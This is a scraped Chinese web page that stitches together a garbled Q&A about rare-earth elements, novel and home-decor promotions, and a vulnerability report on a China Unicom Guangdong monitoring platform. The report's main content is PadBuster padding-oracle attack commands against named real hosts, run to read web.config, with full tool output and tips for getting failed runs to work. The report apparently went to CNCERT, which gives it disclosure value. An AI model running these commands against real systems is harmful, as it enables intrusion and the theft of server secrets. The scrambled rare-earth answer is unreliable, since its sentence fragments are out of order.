来源:蜘蛛抓取(WebSpider)
时间:2018-03-02 12:28
标签:
中国联通合作方门户
稀土中的L.O.I是什么_百度知道
稀土中的L.O.I是什么
我有更好的答案
镝(Dy)、钐(Sm)、镥(Lu)、铕(Eu)、钕(Nd)、镱(Yb)、钬(Ho)、铥(Tm)、铒(Er)、铽(Tb),以及与镧系的15个元素密切相关的两个元素—钪(Sc)和钇(Y)共17种元素、钷(Pm)、镨(Pr)、铈(Ce)稀土就是化学元素周期表中镧系元素—镧(La),称为稀土元素(Rare Earth)。简称稀土(RE或R)、钆(Gd)
采纳率:93%
为您推荐:
其他类似问题
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。卧室又被称作卧房、睡房,分为主卧和次卧,是供人在其内睡觉、休息或进行性活动的房间。......
热门推荐:
HOT专区HOT百科
HOT装修公司HOT设计师
相关品牌:
&&&&&&&&&&&&&&&&&&
相关品牌:
&&&&&&&&&&&&&&
相关品牌:
&&&&&&&&&&&&&&&&&&
相关品牌:
&&&&&&&&&&&&&&&&&&
HOT品类HOT品牌
HOT产品资讯HOT卧室问题
编辑:John
电话:020-8
华北:010-
华东:021-
华南:020-9作为一个穿越后的相府家的千金真够点背的,被绿茶妹妹陷害嫁给冷面王爷还不算,从此与...
为了出人头地,相爱四年的男友,亲手将她送给了陌生人。他叫傅斯年,31岁,华臣老总,...
她曾爱他上瘾,如愿嫁进豪门的她却心如死灰,逃离去了美国。(作者Q群号:,欢...
秦云本是仙界仙帝之子,却被人设计陷害,夺了混沌仙骨,废了修为,更是被父亲封印记忆...
意外触电,获得透视能力,王洋一飞冲天。赌石,让他赚取万贯家财,治病,让他获得万古...
被美女总裁逼婚,他断然拒绝;被各种纨绔挑衅,他随手打脸;被各种高手挑战,他依然最...
飞机失事,我和女上司被困在了一个荒岛,前途艰险,我得保护她,我们要活下去……
【读者交流群:,群里有更新预告、剧…
家族废材凌寒天意外获得一颗吞噬火焰的种子,从此他免疫一切火焰的攻击!
在大荒乱局中斩杀宿敌,与神域无尽天才争锋,镇黑暗动…
一个将死之人穿越异世,成为帝国三大柱国家族凌家废柴少爷身上!既然上天给他重新活过一次的机会,他当然不会错过。看这个废柴少…
九品一局 著
我刚出生的时候,喝了几天狼奶,我把这头狼当妈,我以为我一辈子见不到她,直到有一个女人过来找我………
车祸之后,还被人拖上车强行撞击——一个月后,意外怀孕,她被打个半死。顾天擎,这个站在帝国顶端,最富有最神秘的传奇人物,所…
忘川等待的守候 著
”一入宫门深似海,几个女人一场戏,看谁能笑到最后!女人的战场,她不与置会,只愿独善其身,但却误入其中。女人的战场,他不与…
前世她因为爱上沈逸,落得众叛亲离、尸骨无存的下场。 如今她浴火重生,携恨归来,伤过她的她绝不手软,骗过她的她再不错信,端看…
他堂堂端木王朝的摄政王,不仅被一只九尾狐睡了,而且还睡出个大麻烦。
“主子,那狐儿把后院弄得人仰马翻。”
“宠文天后”程小一人气力作
揭秘红楼梦四大素材库五大悬案
丹·西蒙斯
让整个美国失声尖叫的恐怖经典
河合隼雄/河合俊雄
村上春树推崇的心灵导师作品
阿加莎·克里斯蒂
阿加莎作品少有的“漏网之鱼”
R.J.帕拉西奥
十岁男孩破茧成蝶的不凡故事
同名电影由高仓健、广末凉子主演
早啊晨之美/郭2姑娘
跟本地人体验惬意的日本周末生活
城市·招商
重要通知:
用户你好,近日新浪读书频道出现涉嫌不良内容作品,为维护洁净网络环境,频道决定对内容进行自查自纠,并将陆续恢复审查完的内容和栏目,敬请谅解! 不良内容举报邮箱:kfhelp@vip.sina.com中国联通某监控平台Padding Oracle Vulnerability信息泄露漏洞利用过程
中国联通某监控平台Padding Oracle Vulnerability信息泄露漏洞利用过程
敏感信息泄露
已交由第三方合作机构(cncert国家互联网应急中心)处理
http://lar.unicomgd.com/
上次报过的洞
http://wooyun.org/bugs/wooyun-
今天无聊翻了翻原来发过的洞,看还有没有可利用的,嘿,还真有
ASPX的,看到这个,我就眼前一亮,果然......
我们来看看源代码
padBuster.pl http://lar.unicomgd.com/WebResource.axd?d=rF9mcFBXRdOs0vsKIxd7PQ2 rF9mcFBXRdOs0vsKIxd7PQ2 16 -encoding 3 -plaintext &|||~/web.config&
+-------------------------------------------+
| PadBuster - v0.3
| Brian Holyfield - Gotham Digital Science
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
-------------------------------------------------------
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (146) [Byte 16]
[+] Success: (147) [Byte 15]
[+] Success: (240) [Byte 14]
[+] Success: (125) [Byte 13]
[+] Success: (246) [Byte 12]
[+] Success: (165) [Byte 11]
[+] Success: (108) [Byte 10]
[+] Success: (23) [Byte 9]
[+] Success: (21) [Byte 8]
[+] Success: (84) [Byte 7]
[+] Success: (56) [Byte 6]
[+] Success: (224) [Byte 5]
[+] Success: (241) [Byte 4]
[+] Success: (161) [Byte 3]
[+] Success: (40) [Byte 2]
[+] Success: (246) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 9a5bd382c8cc9d1f9af692
[+] Intermediate Bytes (HEX): e627affcec335e1c1f6ba3f379f39193
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: mlvTgsNEO34xCMydH5r2kgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------
解出第一个密钥,那么最终的密钥也就不远了
第二步密钥
http://lar.unicomgd.com/ScriptResource.axd?d=-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAAAAAAAAAAAAAAAAAAA0
很多人说遇到很多这种漏洞,但是跑不出来,以我的经验来看,WebResource.axd?d=后面的字符串越少越好跑出来,如果非常长,跑出来第一步密钥的几率比较小.
有时当我们碰到字符串比较长的,可以把16 -encoding 3 -plaintext &|||~/web.config& 中的3 改成其他的,比如:
-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64
当出现这个错误时
我们可以把16 -encoding 3 -plaintext &|||~/web.config&中的16改成图上提示的数字.
漏洞证明:
另外还有两个
http://a.unicomgd.com/
http://b.unicomgd.com/
padBuster.pl http://b.unicomgd.com/WebResource.axd?d=0Z76PrPlS9S1mTbXUM_z
q1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL41uw41 0Z76PrP
lS9S1mTbXUM_zq1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL4
1uw41 66 -encoding 0 -plaintext &|||~/web.config&
+-------------------------------------------+
| PadBuster - v0.3
| Brian Holyfield - Gotham Digital Science
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
-------------------------------------------------------
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------
padBuster.pl http://a.unicomgd.com/WebResource.axd?d=yu_vV8xwAIAwLO27Y1AK
pzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7YA1k1 yu_vV8x
wAIAwLO27Y1AKpzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7
YA1k1 64 -encoding 0 -plaintext &|||~/web.config&
+-------------------------------------------+
| PadBuster - v0.3
| Brian Holyfield - Gotham Digital Science
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
-------------------------------------------------------
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------
最终的密钥跑的太久了,就不跑了.
修复方案:
版权声明:转载请注明来源 @
必填(保密)
快来写下你的想法吧!
文章数:38563
(C) 安全脉搏
